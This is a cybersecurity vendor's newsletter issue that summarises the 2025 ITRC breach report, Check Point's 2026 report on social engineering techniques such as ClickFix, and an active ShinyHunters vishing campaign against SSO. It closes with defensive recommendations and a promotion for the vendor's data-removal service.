Welcome to The Optery Dispatch — a newsletter delivering the latest insights on threat intelligence and proactive cybersecurity strategy. In Issue #10, published February 17, 2026, we cover:
- ITRC 2025 Data Breach Report: Phishing, smishing, and BEC remain the #1 root cause across sectors as breach transparency continues to decline.
- Check Point 2026 Cyber Security Report: Social engineering dominates and organizations must align threat intelligence with exposure reduction to reduce attack volume.
- Active SSO Campaign Alert: Shiny Hunters and affiliates target 100+ organizations using live phishing panels and vishing.
Breach Activity Hits Record High as Social Engineering Remains the Leading Root Cause
The ITRC’s 2025 report shows phishing, smishing, and BEC dominating across public and private sectors
The Identity Theft Resource Center’s 2025 Data Breach Report shows that breach activity remains at historic highs, with 3,322 publicly reported data compromises in the U.S., the highest annual total on record.
Phishing, smishing, and business email compromise ranked as the leading root cause of data breaches, increasing slightly year over year and reinforcing that social engineering remains the primary initial access vector for attackers.
Financial Services remained the most targeted sector, while the Professional Services industry (lawyers, accountants, consultants) saw the biggest growth in attacks, as attackers seek to use them as stepping stones to hack their multiple clients.
The report highlights a continued decline in breach transparency. Only 30% of breach notices in 2025 included information about how the breach occurred, down from near-universal disclosure just five years ago, leaving organizations and individuals in the dark about how to protect themselves.
The ITRC also underscores the economic ripple effects of cyber incidents. Eighty-one percent of small businesses reported experiencing a cyberattack, data breach, or both in the past year, with many involving AI-enabled tactics. As a result, nearly 40% said they increased prices to offset remediation and recovery costs, effectively shifting part of the financial burden to customers, “turning cyber-risk into a national inflationary issue.”
In addition to business impact, individuals face significant financial harm. Thirty-six percent of victims reported losing more than $10,000 to identity theft, fraud, or scams linked to data breaches. Among those who sought assistance from the ITRC, more than 20% lost over $100,000, and 11% reported losses exceeding $1 million.
The report notes that “as life-altering as the higher financial losses can be, they pale in comparison to the fact that 67 percent (67%) of victims shared with the ITRC that they had considered self-harm as a result of being the victim of identity theft, fraud or a scam.”
88% of people who received a data breach notice experienced at least one negative consequence after a breach, including an increase in phishing or scam attempts (53.7%), an increase in spam emails or robocalls (49.2%) and attempted account takeovers (40.3%).
For small businesses, the ITRC recommends adopting layered defenses. That includes limiting employee access to only the systems and data necessary for their roles, requiring strong authentication for critical systems (including multi-factor authentication and passkey-based logins), and closely evaluating the security practices of third-party vendors. The report also emphasizes the importance of keeping systems consistently patched through automated updates and maintaining ongoing employee training so staff can recognize and respond to increasingly sophisticated social engineering attempts, including those enhanced by AI.
As social engineering drives the majority of breaches, organizations should also proactively address the external data exposure that fuels these attacks, including employee information readily available through data broker sites.
Minimizing this data reduces the information available for social engineering and lowers the likelihood of targeted attacks.
For more findings, read the full report here: 2025-ITRC-Annual-Data-Breach-Report.pdf
The Human Element is the Most Exploited Attack Surface
Check Point’s 2026 Cyber Security Report documents a variety of social engineering techniques being used against organizations
Check Point’s latest report identifies the human component as the most easily and consistently exploited attack surface in 2025, with social engineering as the dominant attack vector.
While email remains the primary delivery channel for file-based malware (accounting for 82% of malicious file distribution in 2025), Check Point notes that social engineering has expanded far beyond traditional email. Attackers increasingly rely on multi-platform campaigns using phone calls, messaging apps, and real-time impersonation. At the same time, attackers shifted towards interaction-driven techniques like ClickFix, guiding users through legitimate-looking workflows that bypass controls and lead to malware execution.
ClickFix activity surged in 2025, increasing by roughly 500% year over year. It appeared in nearly half of all documented malware campaigns, highlighting how widely the technique has been adopted.
The success of ClickFix quickly led to new techniques such as FileFix. FileFix instructs users to paste attacker-controlled file paths into standard system dialogs, enabling compromise without traditional malware delivery.
Attackers extended ClickFix-style social engineering beyond code execution to account takeover with ConsentFix. This technique manipulates legitimate Microsoft and Azure OAuth flows to obtain access tokens without capturing passwords or completing MFA, directly targeting cloud identity infrastructure.
Voice impersonation became a preferred method among sophisticated threat groups targeting major brands. These campaigns combine deep reconnaissance, multiple communication channels, and complex scripts, and were used to gain initial access in several of the most damaging enterprise intrusions of the year.
Another trend mentioned in the report is that attackers are increasingly engineering scenarios where victims initiate contact, such as abusing public “Contact Us” pages. This approach increases perceived legitimacy by aligning with normal job functions and enables long-running interactions before malware delivery. Similar victim-initiated patterns were observed in fake job recruitment campaigns targeting marketing and advertising professionals. By reversing the interaction flow and building trust over time, attackers significantly increase credibility and compromise success rates.
By late 2025, the report notes that AI had shifted from a support tool to an active participant in cyber operations, with documented campaigns showing AI systems capable of autonomously performing a significant portion of the intrusion lifecycle. Advances in voice cloning, face swapping, and automated scam platforms undermined traditional identity verification, while weaknesses in AI-related infrastructure introduced new paths for compromise.
The report also shows that non-enterprise devices are being favored as the initial point of compromise. Attackers are seeking to access corporate environments by first compromising less-secured endpoints, such as BYOD or otherwise unmanaged devices that are connected, directly or indirectly, to corporate networks. More than 76% of infected systems analyzed were non-corporate devices.
Check Point stresses that security programs must focus on stopping attacks as early as possible while recognizing that no single control is sufficient. Effective defenses prioritize prevention across multiple points in the attack chain and rely on layered safeguards to limit impact when prevention fails.
Attackers typically invest significant time in preparation activities such as impersonation infrastructure and reconnaissance. These early-stage activities often occur outside internal monitoring and represent the earliest opportunity for intervention.
Organizations that align threat intelligence with exposure reduction are better positioned to reduce incident frequency over time. Shrinking what attackers can see and exploit before an attack begins is essential. This must include exposed executive and employee data across the open web.
Read the full report here: Cyber Security Report 2026 | Check Point Software
Shiny Hunters and Affiliates Target SSO Environments in Active Multi-Sector Campaign
Com-linked actors leverage voice impersonation and real-time credential interception to compromise SSO environments
Threat intelligence teams are warning of an active social engineering campaign targeting organizations through their single sign-on (SSO) environments.
The campaign is fueled by targeted voice phishing (“vishing”) attacks combined with company-branded phishing sites designed to steal single sign-on (SSO) credentials and multi-factor authentication (MFA) codes.
These phishing sites use advanced tooling that allows attackers to interact with victims in real time while they are logging in, enabling credentials and MFA tokens to be captured as they are entered. Once access is obtained, attackers have been observed enrolling new devices, moving laterally through internal tools, and exfiltrating data for extortion.
Based on observed infrastructure and targeting activity, more than 100–150 organizations across financial services, healthcare, technology, real estate, manufacturing, logistics, energy, and biotech appear to be in scope.
This campaign follows tactics, techniques, and procedures associated with groups operating as part of ‘The Com’. This includes ShinyHunters and their affiliates, who are confirmed to be involved. Researchers at Silent Push have observed tradecraft aligning with “Scattered LAPSUS$ Hunters,” an affiliation of actors linked to Scattered Spider, LAPSUS$, and ShinyHunters.
Phishing-resistant MFA, such as FIDO2 keys, remains a critical defense against these attacks.
Given documented overlap and shared tradecraft among Com-affiliated groups, and prior confirmation from CISA and the FBI that Scattered Spider-linked operations leverage commercial data brokers for reconnaissance and social engineering, the same data-driven targeting model should be expected in this campaign.
Employee names, roles, phone numbers, and organizational context remain foundational inputs for these vishing attacks. Removing employee info from data broker sites and other publicly available sources can help prevent targeting.
Learn more:
Social Engineering Hackers Target Okta Single Sign On
Mandiant details how ShinyHunters abuse SSO to steal cloud data
A Cybercrime Merger Like No Other — Scattered Spider, LAPSUS$, and ShinyHunters Join Forces
Proactive Defense Against ShinyHunters-Branded Data Theft Targeting SaaS | Google Cloud Blog
Thanks for reading! Want us to write about something specific? Submit a topic or idea.
If you’re looking to reduce your organization’s exposed PII and prevent phishing, voice and messaging scams, credential theft, and other PII-based threats, Optery can help. Get started here: Optery for business
Subscribe to receive future editions of The Optery Dispatch